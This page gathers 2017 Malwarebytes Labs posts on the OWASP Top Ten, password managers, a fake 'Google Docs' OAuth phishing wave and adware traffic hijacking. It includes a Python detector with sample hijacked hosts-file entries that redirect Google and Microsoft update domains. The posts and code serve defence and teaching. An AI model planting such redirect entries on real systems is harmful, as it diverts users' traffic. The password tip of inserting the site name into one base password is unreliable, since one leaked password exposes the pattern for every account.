Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. APT groups have made sensational use of this vulnerability, but so have amateurs working from public data. Including social engineering in red team tests and having defined legal policies in place covering disclosure of company data can diminish exposure.

Insufficient attack protection

The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks. This is a catch-all covering security programs and applications that are ill-conceived, underfunded, or non-existent. Failing here is largely a policy problem.

Cross-site request forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. Such an attack allows the attacker to force a victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. CSRF has been seen referenced as far back as 2001. Like XSS, it can be mitigated by adherence to best practices, in conjunction with security testing.

Using components with known vulnerabilities

Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts. Continuing to use any sort of code with known vulnerabilities is an issue seen almost everywhere, up to and including the US government. This is a very old issue and must generally be patched on the wetware side of the network.

Underprotected APIs

Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities. Testing 3rd party APIs can be difficult, but not impossible. One approach would be to determine the technologies underpinning the API with a site like, and then run pen tests against those technologies.

As you can see, most of these are relatively old and not all require a great deal of difficulty to exploit. What they require is time and attention, along with mature security policies ensuring organizational components work together towards a fix. Unlike arcane APT toolkits, the above vulnerabilities are used indiscriminately. Studies have found up to 65% of observed companies demonstrate exposure to SQL injection, for example. Starting with the old, boring, and extremely effective threats can bring some immediate results to defenders. For more on the top 10, and info on the finalized list when it’s released, check out


William Tsing

The post OWASP Top Ten – Boring security that pays off appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Why you don’t need 27 different passwords

Malwarebytes - Thu, 05/04/2017 - 14:00

Passwords. The bane of modern existence. To celebrate this nuisance, the holiday gods have given us World Password Day, where thousands of people come together online and pledge to improve their password habits. How many of those pledges do you think stick? According to the 2017 Verizon Data Breach Investigation Report, not many. A little over 50 percent of all breaches in the last year leveraged either stolen or weak passwords.

Coincidentally, today is also Star Wars Day (May the 4th Be with You). And while we all wouldn’t mind having a lovable droid guard our passwords as loyally as R2D2 guarded the blueprints for the Death Star, the reality is we’ve got to do the guarding ourselves. And that has become burdensome enough to send Yoda himself over to the Dark Side.

Current state of affairs

According to a poll by Intel Security, the average person has 27 discrete online logins. From social media accounts to banking to online shopping to utilities, credentials—which usually include a username and password—are required for each. And if people are practicing good password hygiene, they’re engaging in the following recommended practices:

  • DO: Use a different password for each account.
  • DO: Use a long password. In fact, the longer, the better.
  • DO: Use special characters, numbers, and capital letters.
  • DO: Change your passwords every couple of months.
  • DO NOT: Write down your password, whether that’s on a piece of paper or stored electronically.
  • DO NOT: Share passwords via text, email, or chat.
  • DO NOT: Use easily identifiable information, such as a birthday or a child’s name.
  • DO NOT: Use an incredibly generic password such as 12345. (That’s the combination an idiot would use on his luggage.)

All of this, for 27 different logins, is simply unmanageable. In fact, the Intel study found that 37 percent of its respondents forgot a password at least once a week. And people are so sick of juggling dozens of different passwords, that 20 percent said they would give up ESPN if it meant never having to remember another one. Six percent said they’d give up pizza. PIZZA.

This level of discontent and security fatigue means that very likely, most users are falling back on bad habits: writing passwords down in a notebook or a Google sheet, for example, or using the same password across multiple logins. (A study by the National Institute of Standards and Technology confirms this: 91 percent of its respondents admitted to reusing passwords.)

So this is why we say: stop it. Stop the bad habits, yes, but stop the “good” ones, too. Having 27 different passwords that are lengthy and full of characters and numbers and need to be changed every few months and can’t be written down—you’d need the memory of an eidetic elephant to keep up. Online services will only multiply, so what should you do?

It’s very simple. Get a password manager.

Password manager 101

For those who might not be familiar, password managers assist in generating, storing, and retrieving passwords from an encrypted database. They typically require that users create and remember one master password to rule them all. One master password to find them. One master password to bring them all, and in the darkness bind them.

One master password to stand at the precipice and shout gallantly, “YOU SHALL NOT PASS!”

Sorry, it couldn’t be helped. As we were saying. Generally, most password managers work the same way. You’ll be asked to create a strong master password during setup (and here’s where you’ll use those password best practices, such as generating a long passphrase with numbers and capitals that steers away from guessable personal info). From there, you’ll add your other credentials to the password manager either manually or through tools that can automatically find and upload passwords for you.

While most password managers have similar setups, they secure passwords in different ways. Web-based password managers store your passwords encrypted in the cloud. Some are built into browsers, such as Safari, Firefox, and Chrome. Others may store your passwords locally in an encrypted file on your computer, tablet, or phone.

In addition, some password managers have features that help you audit your credentials, allowing you to weed out duplicate login info and remove sites you don’t use, or alerting you to breaches that have happened to the companies you log into. Many have customizations that allow increased security, such as regional lockout and two-factor authentication (which we highly recommend taking advantage of).

But aren’t I just asking to be hacked by storing everything in one place?

While some folks might be wary of using a single point of access for all their sites, remember that password managers still use your individual passwords to log in to your accounts. Those passwords are locked in an encrypted database, which is way more secure than a post-it on your office desk or a faulty memory. Ask yourself this: is it safer to store all your money in one bank or to hide it in piles underneath several mattresses?

As for fear of password managers being breached—sure, it’s possible. In fact, it’s already happened, as was the case in 2015 when LastPass was breached. However, even though cybercriminals got their hands on some email addresses, they were unable to crack master passwords. This is because master passwords are protected with military-grade security, hidden behind thousands of rounds of hashing, or algorithms that convert strings of text into longer strings of text. So far, no reputable password manager has leaked consumer master passwords (that we know of).

So which password manager should I use?

The following password managers come highly recommended by our staff and tech reviewers from The New York Times, Lifehacker, and PCMag:

If you don’t trust third-party apps with all of your personal information, you can try an open-source password manager such as KeePassX, though it requires a fair bit of technical know-how to set up.

I am absolutely opposed to a password manager. What else can I do?

While we stand by our recommendation to use password managers, we understand the urge to reject placing all your trust in the hands of another company. So here are a few alternate methods for choosing more secure passwords than the random hodgepodge you’re likely working with now.

  1. Split up your online services into major groups, such as bills, entertainment, shopping, and social media. Assign a single password to each group according to a theme. For example, you could choose movies as your theme and assign quotes from one movie to one group, or character names from a second movie to the second group. Rotate these passwords every 90 days by incrementally adding a number or changing a character. This requires a lot more effort but is still preferable to using the same password across all accounts or having to reset forgotten passwords every week.
  2. Choose one semi-difficult password for all accounts but insert a naming convention in the middle of the password to denote which account you are signing into. For example, if your password is L3tme1npleaz, your Gmail password could be L3tme1nGMAILpleaz. Your Amazon password could be L3tme1nAMAZONpleaz, and so on and so forth.
  3. When possible, choose a service that has two-factor authentication over one that does not. More than 150 applications currently implement two-factor authentication. You can check them out here.

Passwords don’t have to rule your life. You can lock them up behind a password manager and worry about remembering a single, slightly complex phrase instead of 27. You can relax knowing how well guarded your passwords are. And you can go ahead and burn that secret list of passwords you keep in your address book even though you’re not supposed to.

Do you have a favorite password manager? Or a method for creating and remembering unique passwords? Let us know in the comments below.

The post Why you don’t need 27 different passwords appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Google Docs App spam goes phishing

Malwarebytes - Wed, 05/03/2017 - 19:51

There’s a very clever phishing scam going around at the moment – originally thought to be targeting journalists given the sheer number of them mentioning it on their Twitter feeds, it’s also been slinging its way across unrelated mailboxes – from orgs to schools/campuses. This doesn’t mean it didn’t begin with a popped journo mailbox and spread its way out from there or that someone didn’t intentionally send it to a number of journalists of course – but either way, this one has gone viral and not in a “look at the cute cat pic” fashion.

Here’s how it happens

The potential victim receives an email claiming to be from a Mailinator account; Mailinator disputes that the sender has anything to do with its service.

The email reads as follows:

Title: [Contact] has shared a document on Google Docs with you

Body: [Contact] has invited you to view the following document

Hitting the Google-styled “Open in Docs” button takes the clicker to a genuine Google sign-in page, which is sure to wrong-foot many people:

Where this all goes wrong is on the next page, which is where the victim actually gives the app permission to access the account via OAuth. Somehow, nobody at Google thought of preventing people from calling their apps “Google Docs”.

Google Docs would like to

Read, send, delete and manage your email

Manage your contacts

After “Allow” is hit, the spam is then sent on to the victim’s contacts. While 2FA would normally save you from a phishing attempt, in this case the victim is willingly giving permission to the app, so 2FA won’t help – the only solution is to check which apps have been granted permission to the account and revoke the rogue one.

Here are some of the domains being used for this (all offline at the time of writing, but there may be others):

Phish domains:

— Andre M. DiMino (@sempersecurus) May 3, 2017

Google is aware of the situation and is currently working on it. Meanwhile, Cloudflare leapt into action very quickly. We’ll update the post with more information as it comes in.

Christopher Boyd (Thanks to DioDesign and hrbrmstr for screens/data)

The post Google Docs App spam goes phishing appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 2

Malwarebytes - Wed, 05/03/2017 - 15:00

In this post, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Reroute and intercept

We will discuss a few methods to reroute, intercept, and change your internet traffic. They are:

  • Proxies, using a third party server between the machine and the internet.
  • LSP hijacks, inserting a third party file into the Winsock stack.
  • DNS hijacks, connecting to another site by altering the Domain Name System results.


If a system-wide proxy on a Windows computer is set, you will almost always find it in the Microsoft browser. In Internet Explorer, you can find it under Menu (gear icon) > Internet Options > on the Connections tab click the LAN settings button:

Remove the tick under Proxy server to remediate the problem.

In Edge, in the Menu (three dots) select Settings > View Advanced Settings > Open proxy settings > Turn Use a proxy server to Off to disable the proxy.

Browser specific proxies are rare, but I wanted to list the options to change the proxy in your favorite browser anyway.

For Chrome:
  • Click the menu icon
  • Choose Settings (alternatively paste chrome://settings/ into your address bar)
  • Click on Show advanced settings…
  • In the “Network” Section, click Change Proxy Settings. This will open the Internet Properties window, where you can access the LAN Settings as shown above.
For Firefox:
  • Click the menu icon
  • Choose Options
  • Select the Advanced tab (alternatively paste about:preferences#advanced into your address bar)
  • Select the Network tab
  • Under Connection click on Settings and you will see the proxy configuration options

For Opera:
  • Open the menu
  • Choose Settings
  • Open the Browser tab
  • Under Network click the Change proxy settings… button
  • This will open the Internet Properties window, where you can access the LAN Settings as shown earlier.

If you notice that the proxy is running through a port on your localhost (, there is a way to find out which process is responsible. Using the command netstat -ab in a command prompt (elevated as an Administrator) will reveal which process is listening on the port (8003 in our example below).

BetterAds adware having control over port 8003

LSP hijackers

A Layered Service Provider (LSP) is a file (usually a DLL) that uses the Winsock API to insert itself into the TCP/IP stack. There it can intercept, filter, and modify all the traffic between the internet and a system’s applications. LSPs are stacked parts of the Windows Sockets API (Winsock 2), and the layering order of all providers is kept in the Winsock Catalog. As a consequence, LSPs have to be properly uninstalled, i.e. removed from the catalog: just ripping out the file that acts as the LSP could leave you with a broken internet connection. If Malwarebytes removes an LSP hijacker from your system, it will require a reboot to prevent this disconnection from happening.

DNS hijacks

Domain Name Service (DNS) hijacks can be performed at many levels, but in the scope of this series, we will only deal with the ones that act on the system itself.

(a) DNS cache poisoning

By feeding your DNS resolving process false data (in this case, the wrong IP for a certain domain), the system will at some point no longer query the DNS server for the IP but use the wrong data it has in its cache.

Remediation: To clear the Windows DNS cache use the command ipconfig /flushdns in an elevated command prompt.

(b) Hosts file hijacks

The hosts file is a special file located in %windir%\System32\drivers\etc that can be used to store IP addresses that you want to associate with certain domains. This can be used to block advertisements and malicious sites or to map out a local intranet. Adware sometimes replaces the hosts file on the victim’s system with one of its own making in order to hijack traffic.

Remediation: You can edit the hosts file in notepad (elevated). Even though it has no extension it is a text file.

(c) DNS server settings

The DNS server settings are normally stored under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters in the NameServer value which should hold two comma-separated IP addresses that represent the DNS servers for the internet connection that is currently in use.

Remediation: Change the DNS servers for the active internet connection by looking at the properties of the connection in the “Network and Sharing Center”.

For most ISPs this is the recommended setting. If yours are different you may find the necessary information on the provider’s site.
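The two system-level hijacks above, a rewritten hosts file and a changed NameServer value, can both be checked with a few lines of code. The following is an added example written for this post, not Malwarebytes' tooling; the hosts file content, the NameServer strings and the set of trusted resolvers in it are constructed stand-ins for whatever your ISP or IT department actually uses.

```python
"""Check a Windows hosts file and the Tcpip\\Parameters NameServer value for
the hijack patterns described in this post. Added example, not Malwarebytes' code.
"""
import ipaddress
from typing import List, Set, Tuple

# RFC 1918 / link-local / ULA ranges: a hosts entry pointing here is an intranet mapping, not a hijack.
LOCAL_NETWORKS = [ipaddress.ip_network(n) for n in
                  ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                   "169.254.0.0/16", "fe80::/10", "fc00::/7")]

# Constructed sample of %windir%\System32\drivers\etc\hosts after an adware rewrite.
HOSTS_SAMPLE = r"""# constructed sample hosts file
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.adnetwork.example          # ad-blocking entry, harmless
192.168.1.20    wiki.corp.example              # intranet mapping, harmless
203.0.113.45    www.google.com                 # search traffic sent to a foreign host
203.0.113.45    update.microsoft.com           # update lookups sent there too
"""


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs, ignoring comments and blank lines."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:  # one address may carry several names
            pairs.append((fields[0], name.lower()))
    return pairs


def hijacked_entries(text: str) -> List[Tuple[str, str]]:
    """Entries that send a hostname to a routable address outside loopback/local networks."""
    hits = []
    for address, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(address)
        except ValueError:
            hits.append((address, name))  # unparseable address: flag for review
            continue
        if addr.is_loopback or addr.is_unspecified:
            continue  # 127.0.0.1, ::1, 0.0.0.0: blocking or local entries
        if any(addr in net for net in LOCAL_NETWORKS):
            continue  # intranet mapping
        hits.append((address, name))
    return hits


def untrusted_nameservers(nameserver_value: str, trusted: Set[str]) -> List[str]:
    """Parse the NameServer string (comma or space separated) and return servers
    not in the trusted set. An empty value means the adapter takes its resolvers
    from DHCP, which the post notes is the usual setting for most ISPs."""
    servers = nameserver_value.replace(",", " ").split()
    return [s for s in servers if s not in trusted]


def read_nameserver_from_registry() -> str:
    """On Windows, read the registry value the post refers to; elsewhere return ''."""
    try:
        import winreg
    except ImportError:
        return ""
    key_path = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
        try:
            value, _ = winreg.QueryValueEx(key, "NameServer")
        except FileNotFoundError:
            return ""
    return value


if __name__ == "__main__":
    for address, name in hijacked_entries(HOSTS_SAMPLE):
        print("hosts hijack:", name, "->", address)
    # Constructed trusted set; replace with your provider's resolvers.
    print("untrusted resolvers:", untrusted_nameservers(read_nameserver_from_registry(),
                                                        {"198.51.100.10", "198.51.100.11"}))
```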

Index

Part 1:
  • Identify the process
  • Clear browser caches
  • Remove browser extensions
Part 2:
  • Proxies
  • Winsock hijackers
  • DNS hijackers
Up next, part 3:
  • Type of software
  • Uninstall
  • Remove file
  • Replace file


Pieter Arntz

The post Adware the series, part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds
